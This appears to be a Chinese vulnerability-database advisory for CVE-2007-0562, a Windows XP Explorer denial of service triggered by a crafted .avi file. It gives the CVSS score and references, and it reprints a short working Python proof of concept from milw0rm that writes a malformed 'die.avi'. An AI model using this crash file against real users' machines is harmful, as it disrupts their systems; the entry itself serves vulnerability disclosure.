Microsoft Windows Windows Explorer 特制.avi文件漏洞拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112071 漏洞类型 未知
发布时间 2007-01-24 更新时间 2007-01-30
CVE编号 CVE-2007-0562 CNNVD-ID CNNVD-200701-543
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/3190
https://www.securityfocus.com/bid/86733
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-543
|漏洞详情
MicrosoftWindowsXPSP2版本的WindowsExplorer(explorer.exe)用户协助式的远程攻击者可以借助一个特制的.avi文件,造成拒绝服务(应用程序崩溃),当用户权在该文件上点击时,会触发崩溃。
|漏洞EXP
print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"

fileOut = open('die.avi','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()

# milw0rm.com [2007-01-24]
|受影响的产品
Microsoft Windows Explorer 6.00.2900.2180
|参考资料

来源:MILW0RM
名称:3190
链接:http://www.milw0rm.com/exploits/3190
来源:OSVDB
名称:43307
链接:http://osvdb.org/43307
来源:MILW0RM
名称:3190
链接:http://milw0rm.com/exploits/3190